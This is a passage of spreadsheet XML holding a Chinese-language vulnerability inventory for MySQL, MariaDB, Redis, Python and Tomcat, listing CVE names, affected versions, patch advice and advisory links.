    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1353
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2886</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB 远程安全漏洞(CVE-2017-3651)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201707-1278
http://rhn.redhat.com/errata/RHSA-2016-2927.html
http://www.oracle.com/technetwork/security-advisory/cpujul2017-3236622.html
http://www.securitytracker.com/id/1038928
https://access.redhat.com/errata/RHSA-2017:2787
https://access.redhat.com/errata/RHSA-2017:2886
https://access.redhat.com/errata/RHSA-2018:2439
https://access.redhat.com/errata/RHSA-2017:2192
https://www.debian.org/security/2017/dsa-3922
https://access.redhat.com/errata/RHSA-2018:2729
http://rhn.redhat.com/errata/RHSA-2016-2928.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB远程安全漏洞(CVE-2017-10379)</t>
  </si>
  <si>
    <t>影响MySQL:5.5.0版本(含)到5.5.57版本(含),5.6.0版本(含)到5.6.37版本(含),5.7.0版本(含)到5.7.19版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-738
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-10283)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-821
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>Redis 输入验证错误漏洞（CVE-2023-22458）</t>
  </si>
  <si>
    <t>影响redis:6.2.0版本(含)到6.2.9版本,7.0版本(含)到7.0.8版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://github.com/redis/redis/security/advisories/GHSA-r8w2-2m53-gprj</t>
  </si>
  <si>
    <t>https://github.com/redis/redis/security/advisories/GHSA-r8w2-2m53-gprj</t>
  </si>
  <si>
    <t>Redis拒绝服务漏洞（CVE-2022-36021）</t>
  </si>
  <si>
    <t>影响Redis:6.0.18以下版本,6.2.0版本(含)到6.2.11版本,7.0版本(含)到7.0.9版本</t>
  </si>
  <si>
    <t>厂商补丁:Redis-----目前厂商已经发布了升级补丁以修复这个安全问题，请到厂商的主页下载：https://github.com/redis/redis/commit/dcbfcb916ca1a269b3feef86ee86835294758f84</t>
  </si>
  <si>
    <t>Redis代码执行漏洞（CVE-2024-46981）</t>
  </si>
  <si>
    <t>影响Redis:7.4.0版本(含)到7.4.2版本,7.2.0版本(含)到7.2.7版本,6.2.17之前的所有版本</t>
  </si>
  <si>
    <t>官方已发布最新版本修复该漏洞，建议受影响用户将Redis更新到以下版本： Redis 6.2.17 或更高版本。 Redis 7.2.7 或更高版本。 Redis 7.4.2 或更高版本。</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2024-46981</t>
  </si>
  <si>
    <t>Python 资源管理错误漏洞(CVE-2019-9674)</t>
  </si>
  <si>
    <t>影响Python:3.7.2(含)之前版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://bugs.python.org/issue36462 
 https://bugs.python.org/issue36260</t>
  </si>
  <si>
    <t>Python 输入验证错误漏洞(CVE-2020-8315)</t>
  </si>
  <si>
    <t>影响Python:3.6.0版本(含)到3.6.10版本(含),3.7.0版本(含)到3.7.6版本(含),3.8.0版本(含)到3.8.1版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://bugs.python.org/issue39401</t>
  </si>
  <si>
    <t>Python 输入验证错误漏洞(CVE-2019-20907)</t>
  </si>
  <si>
    <t>影响Python:3.8.3之前的版本</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://bugs.python.org/issue39017</t>
  </si>
  <si>
    <t>Python 代码问题漏洞(CVE-2020-15523)</t>
  </si>
  <si>
    <t>影响Python:3.6.0版本(含)到3.6.10版本(含),3.7.0版本(含)到3.7.8版本(含),3.8.0版本(含)到3.8.3版本(含),3.8.4rc1版本,3.9.0a1版本(含)到3.9.0a6版本(含),3.9.0b1版本(含)到3.9.0b4版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：
https://bugs.python.org/issue29778</t>
  </si>
  <si>
    <t>Python 缓冲区错误漏洞(CVE-2021-3177)</t>
  </si>
  <si>
    <t>影响Python:3.6.0版本(含)到3.6.12版本(含),3.7.0版本(含)到3.7.9版本(含),3.8.0版本(含)到3.8.7版本(含),3.9.0版本(含)到3.9.1版本(含)</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已发布升级补丁以修复漏洞，补丁获取链接：  https://python-security.readthedocs.io/vuln/ctypes-buffer-overflow-pycarg_repr.html</t>
  </si>
  <si>
    <t>Python 资源管理错误漏洞(CVE-2021-3733)</t>
  </si>
  <si>
    <t>影响Python:3.6.14以下版本,3.7.0版本(含)到3.7.11版本,3.8.0版本(含)到3.8.10版本,3.9.0版本(含)到3.9.5版本,3.10.0版本</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已发布升级补丁以修复漏洞，补丁获取链接：  https://www.python.org/downloads/</t>
  </si>
  <si>
    <t>Python 代码问题漏洞(CVE-2022-26488)</t>
  </si>
  <si>
    <t>影响Python:3.7.12以下版本(含),3.8.0版本(含)到3.8.12版本(含),3.9.0版本(含)到3.9.10版本(含),3.10.0版本(含)到3.10.2版本(含),3.11.0.alpha1版本(含)到3.11.0.alpha6版本(含)</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已发布升级补丁以修复漏洞，补丁获取链接：  https://mail.python.org/archives/list/security-announce@python.org/thread/657Z4XULWZNIY5FRP3OWXHYKUSIH6DMN/</t>
  </si>
  <si>
    <t>Python 安全漏洞(CVE-2023-27043)</t>
  </si>
  <si>
    <t>影响Python:2.7.0版本(含)到2.7.18版本,3.0版本(含)到3.11版本</t>
  </si>
  <si>
    <t>建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法https://www.python.org/</t>
  </si>
  <si>
    <t>https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-27043</t>
  </si>
  <si>
    <t>Python 安全漏洞(CVE-2023-36632)</t>
  </si>
  <si>
    <t>影响python:3.11.4版本(含)以下版本</t>
  </si>
  <si>
    <t>目前厂商暂未发布修复措施解决此安全问题，建议使用此软件的用户随时关注厂商主页或参考网址以获取解决办法:https://docs.python.org/3/library/email.html</t>
  </si>
  <si>
    <t>https://www.python.org/</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2021-2372)</t>
  </si>
  <si>
    <t>影响mysql:5.7.0版本(含)到5.7.34版本(含),8.0.0版本(含)到8.0.25版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2021-2390)</t>
  </si>
  <si>
    <t>厂商补丁:https://www.oracle.com</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2021-35624)</t>
  </si>
  <si>
    <t>影响mysql:5.7.0版本(含)到5.7.35版本(含),8.0.0版本(含)到8.0.26版本(含)</t>
  </si>
  <si>
    <t>链接：https://www.oracle.com/security-alerts/cpuoct2021.html
https://ubuntu.com/security/notices/USN-5123-2</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2022-21245)</t>
  </si>
  <si>
    <t>影响mysql:5.7.0版本(含)到5.7.36版本(含),8.0.0版本(含)到8.0.27版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.cybersecurity-help.cz/vdb/SB2022011905</t>
  </si>
  <si>
    <t>链接：https://www.cybersecurity-help.cz/vdb/SB2022011905</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2022-21270)</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞(CVE-2022-21344)</t>
  </si>
  <si>
    <t>MySQL资源管理错误漏洞(CVE-2021-22945)</t>
  </si>
  <si>
    <t>5.7.0 &lt;= MySQL &lt; 5.7.358.0.0 &lt;= MySQL &lt; 8.0.26</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接:https://www.oracle.com/hk/security-alerts/</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2021-22945</t>
  </si>
  <si>
    <t>Oracle MySQL Server 拒绝服务漏洞(CVE-2021-22922)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，详情请关注厂商主页：https://security.archlinux.org/advisory/ASA-202107-59</t>
  </si>
  <si>
    <t>https://nvd.nist.gov/vuln/detail/CVE-2021-22922</t>
  </si>
  <si>
    <t>Oracle MySQL cURL 组件输入验证错误漏洞(CVE-2022-27778)</t>
  </si>
  <si>
    <t>影响mysql:5.7.0版本(含)到5.7.38版本(含),8.0.0版本(含)到8.0.29版本(含)</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2777)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1244
https://security.netapp.com/advisory/ntap-20180419-0002/
https://usn.ubuntu.com/3629-3/
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
http://www.securitytracker.com/id/1040698
https://access.redhat.com/errata/RHSA-2018:3655
https://access.redhat.com/errata/RHSA-2019:1258
https://usn.ubuntu.com/3629-1/
https://access.redhat.com/errata/RHSA-2019:1258
https://packetstormsecurity.com/files/154133/Gentoo-Linux-Security-Advisory-201908-24.html
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://packetstormsecurity.com/files/152981/Red-Hat-Security-Advisory-2019-1258-01.html</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-800
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-812
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-802
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-10314)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-799
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2017-10279)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-824
https://security.netapp.com/advisory/ntap-20171019-0002/
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html
http://www.securitytracker.com/id/1039597
https://access.redhat.com/errata/RHSA-2017:3442
https://access.redhat.com/errata/RHSA-2017:3265</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB 远程安全漏洞(CVE-2017-10286)</t>
  </si>
  <si>
    <t>影响MySQL:5.5.0版本(含)到5.6.37版本(含),5.7.0版本(含)到5.7.19版本</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201710-818
http://www.oracle.com/technetwork/security-advisory/cpuoct2017-3236626.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server安全漏洞（CVE-2019-2510）</t>
  </si>
  <si>
    <t>影响MySQL:5.7.0版本(含)到5.7.24版本(含),8.0.0版本(含)到8.0.13版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/technetwork/security-advisory/cpujan2019-5072801.html</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201901-678</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2773)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1248
https://security.netapp.com/advisory/ntap-20180419-0002/
https://usn.ubuntu.com/3629-3/
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
http://www.securitytracker.com/id/1040698
https://access.redhat.com/errata/RHSA-2018:3655
https://www.debian.org/security/2018/dsa-4176
https://access.redhat.com/errata/RHSA-2018:1254
https://usn.ubuntu.com/3629-1/
https://usn.ubuntu.com/3629-2/
https://lists.debian.org/debian-lts-announce/2018/04/msg00020.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2818)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1203
https://security.netapp.com/advisory/ntap-20180419-0002/
https://usn.ubuntu.com/3629-3/
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
http://www.securitytracker.com/id/1040698
https://access.redhat.com/errata/RHSA-2018:3655
https://www.debian.org/security/2018/dsa-4176
https://access.redhat.com/errata/RHSA-2018:1254
https://usn.ubuntu.com/3629-1/
https://usn.ubuntu.com/3629-2/
https://lists.debian.org/debian-lts-announce/2018/04/msg00020.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2019-2960)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201910-995
https://www.oracle.com/technetwork/security-advisory/cpuoct2019verbose-5072833.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2019-2974)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.0版本(含)到5.6.45版本(含),5.7.0版本(含)到5.7.27版本(含),8.0.0版本(含)到8.0.17版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201910-989
https://www.oracle.com/technetwork/security-advisory/cpuoct2019verbose-5072833.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2020-2579)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.0版本(含)到5.6.46版本(含),5.7.0版本(含)到5.7.28版本(含),8.0.0版本(含)到8.0.18版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202012-1914
https://usn.ubuntu.com/4250-1/</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2020-2660)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-202102-1522
https://usn.ubuntu.com/4250-1/</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞</t>
  </si>
  <si>
    <t>影响mysql:5.5.0版本(含)到5.5.54版本(含),5.6.0版本(含)到5.6.35版本(含),5.7.0版本(含)到5.7.17版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201704-1198
https://www.oracle.com/technetwork/security-advisory/cpuapr2017-3236618.html#AppendixMSQL
http://riddle.link/
https://www.oracle.com/ocom/groups/public/@otn/documents/webcontent/3681811.xml
https://dev.mysql.com/doc/relnotes/mysql/5.5/en/news-5-5-55.html</t>
  </si>
  <si>
    <t>Oracle MySQL/MariaDB 拒绝服务漏洞(CVE-2021-2011)</t>
  </si>
  <si>
    <t>厂商补丁：Oracle已经为此发布了一个安全公告（2021-01-19）以及相应补丁2021-01-19：Oracle Critical Patch Update Advisory - January 2021链接：https://www.oracle.com/security-alerts/cpujan2021.html Mariadb目前厂商已发布升级补丁以修复漏洞，补丁获取链接https://mariadb.com/kb/en/security/</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujan2021.html
https://mariadb.com/kb/en/security/</t>
  </si>
  <si>
    <t>Oracle MySQL Server 安全漏洞(CVE-2020-14539)</t>
  </si>
  <si>
    <t>影响mysql:5.6.0版本(含)到5.6.48版本(含),5.7.0版本(含)到5.7.30版本(含),8.0.0版本(含)到8.0.20版本(含)</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujul2020.html
https://access.redhat.com/errata/RHSA-2020:3518
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2019-2911</t>
  </si>
  <si>
    <t>Oracle MySQL 安全漏洞(CVE-2021-2014)</t>
  </si>
  <si>
    <t>影响mysql:5.7.0版本(含)到5.7.32版本(含)</t>
  </si>
  <si>
    <t>https://www.oracle.com/security-alerts/cpujan2021.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server 输入验证错误漏洞（CVE-2021-21445）</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/security-alerts/cpujan2021.html</t>
  </si>
  <si>
    <t>Apache Tomcat 信息泄露漏洞 (CVE-2023-28708)</t>
  </si>
  <si>
    <t>影响apache tomcat: 8.5.0版本(含)至8.5.85版本(含),9.0.0-M1版本(含)至9.0.71版本(含),10.1.0-M1版本(含)至10.1.5版本(含),11.0.0-M1版本(含)至11.0.0-M2版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布修复漏洞的最新版本，请及时下载安装安全版本：https://tomcat.apache.org/tomcat-11.0-doc/index.html</t>
  </si>
  <si>
    <t>https://tomcat.apache.org/security-11.html
https://tomcat.apache.org/security-10.html
https://tomcat.apache.org/security-9.html
https://tomcat.apache.org/security-8.html</t>
  </si>
  <si>
    <t>MariaDB 安全漏洞(CVE-2022-32091)</t>
  </si>
  <si>
    <t>影响MariaDB:10.3.0版本(含)到10.3.36版本,10.4.0版本(含)到10.4.26版本,10.5.0版本(含)到10.5.17版本,10.6.0版本(含)到10.6.9版本,10.7.0版本(含)到10.7.5版本,10.8.0版本(含)到10.8.4版本,10.9.0版本(含)到10.9.2版本</t>
  </si>
  <si>
    <t>厂商补丁: 目前厂商已发布升级补丁以修复漏洞，补丁获取链接：  https://jira.mariadb.org/browse/MDEV-26431</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2779)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1242
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2786)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1235</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2812)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1209
https://security.netapp.com/advisory/ntap-20180419-0002/
https://usn.ubuntu.com/3629-3/
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
http://www.securitytracker.com/id/1040698
https://access.redhat.com/errata/RHSA-2018:3655
https://usn.ubuntu.com/3629-1/</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2839)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1182
https://security.netapp.com/advisory/ntap-20180419-0002/
https://usn.ubuntu.com/3629-3/
http://www.oracle.com/technetwork/security-advisory/cpuapr2018-3678067.html
http://www.securitytracker.com/id/1040698
https://access.redhat.com/errata/RHSA-2018:3655
https://usn.ubuntu.com/3629-1/</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2766)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.0版本(含)到5.6.39版本(含),5.7.0版本(含)到5.7.21版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1254
https://lists.debian.org/debian-lts-announce/2018/06/msg00015.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2784)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1237</t>
  </si>
  <si>
    <t>Oracle MySQL Server远程安全漏洞(CVE-2018-2787)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201804-1234</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3054)</t>
  </si>
  <si>
    <t>影响MySQL:5.7.0版本(含)到5.7.22版本(含),8.0.0版本(含)到8.0.11版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1376
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-23.html
https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1525
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1361
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1365
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1366
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1367
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1369
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1370
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201803-951
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1354
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1374</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3058)</t>
  </si>
  <si>
    <t>影响MySQL:5.5.0版本(含)到5.5.60版本(含),5.6.0版本(含)到5.6.40版本(含),5.7.0版本(含)到5.7.22版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201807-1372
https://www.debian.org/security/2018/dsa-4341
https://access.redhat.com/errata/RHSA-2019:1258
https://lists.debian.org/debian-lts-announce/2018/08/msg00036.html
http://www.securitytracker.com/id/1041294
https://access.redhat.com/errata/RHSA-2019:2327
https://lists.debian.org/debian-lts-announce/2018/11/msg00004.html
https://usn.ubuntu.com/3725-2/
https://usn.ubuntu.com/3725-1/
https://access.redhat.com/errata/RHSA-2018:3655
http://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html
https://security.netapp.com/advisory/ntap-20180726-0002/
https://access.redhat.com/errata/RHSA-2019:1258
https://www.suse.com/support/update/announcement/2019/suse-su-20191441-1.html
https://www.suse.com/support/update/announcement/2019/suse-su-20190628-1.html
https://access.redhat.com/errata/RHSA-2019:2327
https://www.suse.com/support/update/announcement/2019/suse-su-20190555-1.html
https://www.suse.com/support/update/announcement/2019/suse-su-20190555-1/
https://www.auscert.org.au/bulletins/ESB-2019.2967/
https://www.auscert.org.au/bulletins/ESB-2019.0874.2/
https://www.auscert.org.au/bulletins/76786
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://www.auscert.org.au/bulletins/76662
https://www.auscert.org.au/bulletins/77326
https://packetstormsecurity.com/files/152981/Red-Hat-Security-Advisory-2019-1258-01.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3064)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.0版本(含)到5.6.40版本(含),5.7.0版本(含)到5.7.22版本(含),8.0.0版本(含)到8.0.11版本(含)</t>
  </si>
  <si>
    <t>https://dev.mysql.com/doc/relnotes/mysql/5.6/en/news-5-6-41.html
https://www.oracle.com/technetwork/security-advisory/cpujul2018-4258247.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server/MariaDB 安全漏洞(CVE-2016-9843)</t>
  </si>
  <si>
    <t>影响MySQL:5.5.0版本(含)到5.5.61版本(含),5.6.0版本(含)到5.6.41版本(含),5.7.0版本(含)到5.7.23版本(含),8.0.0版本(含)到8.0.12版本(含)</t>
  </si>
  <si>
    <t>目前厂商已经发布了升级补丁以修复此安全问题，补丁获取链接：https://www.oracle.com/security-alerts/cpuoct2018.html、https://github.com/madler/zlib/commit/d1d577490c15a0c6862473d7576352a9f18ef811</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3247)</t>
  </si>
  <si>
    <t>影响MySQL:5.6.0版本(含)到5.6.41版本(含),5.7.0版本(含)到5.7.23版本(含),8.0.0版本(含)到8.0.12版本(含)</t>
  </si>
  <si>
    <t>目前厂商已发布升级补丁以修复漏洞，补丁获取链接：https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-848
https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-24.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-935
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-936
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-920
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-918
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-917
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-818
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-820
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-819
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-958
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-844
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-812
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-813
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-814
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-906
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201612-754
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-904
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-948
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-947
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-892
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-929
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-930</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3187)</t>
  </si>
  <si>
    <t>影响MySQL:5.7.0版本(含)到5.7.23版本(含),8.0.0版本(含)到8.0.12版本(含)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-904
https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
https://dev.mysql.com/doc/relnotes/mysql/5.7/en/news-5-7-24.html
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-935
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-936
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-920
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-918
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-917
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-818
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-820
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-819
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-958
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-844
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-812
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-813
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-814
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-906
https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201612-754</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3171)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-920
https://dev.mysql.com/doc/relnotes/mysql/8.0/en/news-8-0-13.html
https://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html</t>
  </si>
  <si>
    <t>Oracle MySQL Server组件安全漏洞(CVE-2018-3284)</t>
  </si>
  <si>
    <t>https://www.cnnvd.org.cn/home/globalSearch?keyword=CNNVD-201810-812
https://usn.ubuntu.com/3799-1/
https://access.redhat.com/errata/RHSA-2018:3655
http://www.securitytracker.com/id/1041888
https://security.netapp.com/advisory/ntap-20181018-0002/
https://access.redhat.com/errata/RHSA-2019:1258
http://www.oracle.com/technetwork/security-advisory/cpuoct2018-4428296.html
https://security.gentoo.org/glsa/201908-24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https://packetstormsecurity.com/files/154133/Gentoo-Linux-Security-Advisory-201908-24.html
https://www.auscert.org.au/bulletins/ESB-2019.0874.2/
https://www.auscert.org.au/bulletins/76786
https://www.auscert.org.au/bulletins/ESB-2019.1829/
https://www.auscert.org.au/bulletins/76662
https://www.auscert.org.au/bulletins/77326</t>
  </si>
  <si>
